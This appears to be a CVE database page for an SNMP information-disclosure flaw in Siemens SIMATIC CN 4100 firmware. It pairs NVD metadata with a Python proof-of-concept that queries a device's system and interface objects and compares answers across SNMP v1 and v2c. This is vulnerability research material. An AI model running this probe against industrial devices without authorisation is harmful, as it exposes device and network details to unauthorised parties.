Security Vulnerability Report
CVE-2025-40940 CVSS 4.9 MEDIUM

CVE-2025-40940

Published: 2025-12-09 16:17:48
Last Modified: 2025-12-10 21:35:00

Description

A vulnerability has been identified in SIMATIC CN 4100 (All versions < V4.0.1). The affected application exhibits inconsistent SNMP behavior, such as unexpected service availability and unreliable configuration handling across protocol versions. This could allow an attacker to access sensitive data, potentially leading to a breach of confidentiality. NVD classifies the weakness as CWE-200 (exposure of sensitive information to an unauthorized actor); the fix is to update to V4.0.1 or later, per the Siemens advisory referenced below.

CVSS Details

CVSS Score
4.9
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
(NVD primary score. Network-reachable, low attack complexity, but high privileges required — in practice a valid, privileged SNMP community string — no user interaction, confidentiality impact only. The vendor also supplied a secondary CVSS v4.0 vector, CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N, scoring 6.9 MEDIUM.)

Configurations (Affected Products)

cpe:2.3:o:siemens:simatic_cn_4100_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:siemens:simatic_cn_4100:-:*:*:*:*:*:*:* - NOT VULNERABLE (hardware platform; listed only as the running-on context of the firmware match above, not as an affected product in its own right — the defect is in the firmware)
SIMATIC CN 4100 < V4.0.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only. Note that it performs a generic read of standard MIB-II objects (sysDescr, sysName, ifTable): it shows only what the agent discloses to the supplied community string and does not by itself confirm CVE-2025-40940, whose defining symptom is behavior that differs between SNMP protocol versions.
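#!/usr/bin/env python3
# CVE-2025-40940 PoC - SIMATIC CN 4100 SNMP Information Disclosure
#
# Description: reads the standard MIB-II system and interface objects from the
# target's SNMP agent and, because the advisory describes *inconsistent*
# behaviour across protocol versions (unexpected service availability,
# unreliable configuration handling), issues the same requests under SNMP v1
# and v2c and flags any difference.  A difference is an indicator only; it does
# not by itself prove the device is vulnerable, and everything returned is
# limited to what the agent discloses for the supplied community string.
#
# NOTE(review): written against the synchronous pysnmp hlapi (getCmd/nextCmd
# returning iterators, i.e. the classic 4.x line).  Later pysnmp releases ship
# an asyncio-first API with different names -- confirm the installed version.
import os
import sys

from pysnmp.hlapi import (
    CommunityData,
    ContextData,
    ObjectIdentity,
    ObjectType,
    SnmpEngine,
    UdpTransportTarget,
    getCmd,
    nextCmd,
)

# SNMP message-processing model for each protocol version this script speaks
# (v3 would need USM credentials, not a community string).
_MP_MODEL = {"1": 0, "2c": 1}

SNMP_PORT = 161
SYS_DESCR_OID = "1.3.6.1.2.1.1.1.0"  # SNMPv2-MIB::sysDescr.0
SYS_NAME_OID = "1.3.6.1.2.1.1.5.0"   # SNMPv2-MIB::sysName.0
IF_TABLE_OID = "1.3.6.1.2.1.2.2.1"   # IF-MIB::ifEntry


def _community(community, version):
    """Return CommunityData for *version* ('1' or '2c').

    Raises ValueError for anything else.  The original mapped every string other
    than '2c' to v1, so a typo such as 'v2c' silently changed the protocol used.
    """
    try:
        return CommunityData(community, mpModel=_MP_MODEL[version])
    except KeyError:
        raise ValueError(
            f"unsupported SNMP version {version!r}; expected '1' or '2c'"
        ) from None


def _transport(target_ip, port, timeout, retries):
    """UDP transport with an explicit timeout/retry budget so a silent agent fails fast."""
    return UdpTransportTarget((target_ip, port), timeout=timeout, retries=retries)


def _print_error(version, oid, error_indication, error_status, error_index):
    """Print the reason a request failed, in one consistent form."""
    if error_indication:
        # Transport-level failure (timeout, unreachable, ...): same text as before.
        print(f"[ERROR] {error_indication}")
    else:
        # Agent answered but with a non-zero error-status; error_index is 1-based
        # and names the offending var-bind.
        print(
            f"[ERROR] v{version} {oid}: {error_status.prettyPrint()} "
            f"(index {error_index})"
        )


def snmp_get(community, target_ip, oid, version="2c", *, port=SNMP_PORT, timeout=2, retries=1):
    """Send one SNMP GET for *oid* and return its value as a string.

    Returns None after printing the reason when the transport fails or when the
    agent answers with a non-zero error-status.  (The original checked only the
    transport error and would return a 'noSuchObject' marker as if it were data.)
    """
    error_indication, error_status, error_index, var_binds = next(
        getCmd(
            SnmpEngine(),
            _community(community, version),
            _transport(target_ip, port, timeout, retries),
            ContextData(),
            ObjectType(ObjectIdentity(oid)),
        )
    )
    if error_indication or error_status:
        _print_error(version, oid, error_indication, error_status, error_index)
        return None
    for var_bind in var_binds:
        return str(var_bind[1])
    return None


def snmp_walk(community, target_ip, oid_base, version="2c", *, port=SNMP_PORT, timeout=2, retries=1):
    """Walk the subtree under *oid_base* and return a list of (oid, value) string pairs.

    Stops at the first transport error or agent error-status, printing the reason
    rather than silently truncating the result.  lexicographicMode=False keeps the
    walk inside *oid_base* instead of continuing to the end of the MIB.
    """
    results = []
    for error_indication, error_status, error_index, var_binds in nextCmd(
        SnmpEngine(),
        _community(community, version),
        _transport(target_ip, port, timeout, retries),
        ContextData(),
        ObjectType(ObjectIdentity(oid_base)),
        lexicographicMode=False,
    ):
        if error_indication or error_status:
            _print_error(version, oid_base, error_indication, error_status, error_index)
            break
        results.extend((str(var_bind[0]), str(var_bind[1])) for var_bind in var_binds)
    return results


def probe_versions(community, target_ip, oids, versions=("1", "2c"), **transport_kwargs):
    """GET every OID in *oids* under each protocol version in *versions*.

    Returns {oid: {version: value_or_None}}.  Same community string, same OIDs,
    different message-processing model: the most direct observable for the
    cross-version inconsistency the advisory describes.
    """
    return {
        oid: {
            version: snmp_get(community, target_ip, oid, version, **transport_kwargs)
            for version in versions
        }
        for oid in oids
    }


def report_inconsistencies(probe):
    """Print OIDs whose availability or value differs between versions; return their count.

    A difference here is something to follow up on, not proof of CVE-2025-40940:
    an agent may legitimately be configured to answer only one protocol version.
    """
    differing = 0
    for oid, by_version in probe.items():
        if len(set(by_version.values())) > 1:
            differing += 1
            print(f"[!] {oid} differs across SNMP versions:")
            for version, value in by_version.items():
                print(f"    v{version}: {'no answer' if value is None else value}")
    return differing


def main():
    """Entry point: ``cve_2025_40940_poc.py <target_ip> [community_string]``.

    The community string may also be supplied in the SNMP_COMMUNITY environment
    variable, which keeps it out of shell history and ``ps`` output; passing it
    as the second argument is still accepted for compatibility.
    """
    community = os.environ.get("SNMP_COMMUNITY")
    if len(sys.argv) > 2:
        community = sys.argv[2]
    if len(sys.argv) < 2 or not community:
        print("Usage: python cve_2025_40940_poc.py <target_ip> <community_string>")
        print("       (or export SNMP_COMMUNITY instead of passing the string as an argument)")
        sys.exit(1)
    target_ip = sys.argv[1]

    print(f"[*] Targeting {target_ip} - CVE-2025-40940 PoC")
    print("[*] Testing SNMP service availability...")

    # Basic system-info disclosure over v2c, as before.
    sys_descr = snmp_get(community, target_ip, SYS_DESCR_OID)
    if sys_descr:
        print(f"[+] System Description: {sys_descr}")
    sys_name = snmp_get(community, target_ip, SYS_NAME_OID)
    if sys_name:
        print(f"[+] System Name: {sys_name}")

    print("[*] Enumerating network interfaces...")
    if_table = snmp_walk(community, target_ip, IF_TABLE_OID)
    print(f"[+] Found {len(if_table)} interface entries")

    # The advisory's actual defect is version-dependent behaviour; the original
    # printed this banner and then checked nothing.
    print("[*] Checking for exposed configuration data...")
    print("[*] Comparing responses under SNMP v1 and v2c...")
    probe = probe_versions(community, target_ip, (SYS_DESCR_OID, SYS_NAME_OID))
    if report_inconsistencies(probe) == 0:
        print("[-] No cross-version differences observed for the probed OIDs")

    print("\n[!] Note: This PoC demonstrates SNMP information disclosure")
    print("[!] Requires valid community string and high-privilege access")
    print("[!] Cross-version differences are an indicator only; see Siemens SSA-416652")


if __name__ == "__main__":
    main()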

References

https://cert-portal.siemens.com/productcert/html/ssa-416652.html — Siemens ProductCERT advisory SSA-416652 (Vendor Advisory; contains the fixed version and any workarounds)
Raw JSON Data

{"cve": {"id": "CVE-2025-40940", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:17:47.813", "lastModified": "2025-12-10T21:34:59.600", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability has been identified in SIMATIC CN 4100 (All versions < V4.0.1). The affected application exhibits inconsistent SNMP behavior, such as unexpected service availability and unreliable configuration handling across protocol versions. This could allow an attacker to access sensitive data, potentially leading to a breach of confidentiality."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": 
"NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-200"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:siemens:simatic_cn_4100_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.0.1", "matchCriteriaId": "FF07D3DA-F412-4FBF-BB1B-3C889F74509E"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:siemens:simatic_cn_4100:-:*:*:*:*:*:*:*", "matchCriteriaId": "92619F5F-3679-4424-9455-3285FF1EF2F1"}]}]}], "references": [{"url": "https://cert-portal.siemens.com/productcert/html/ssa-416652.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}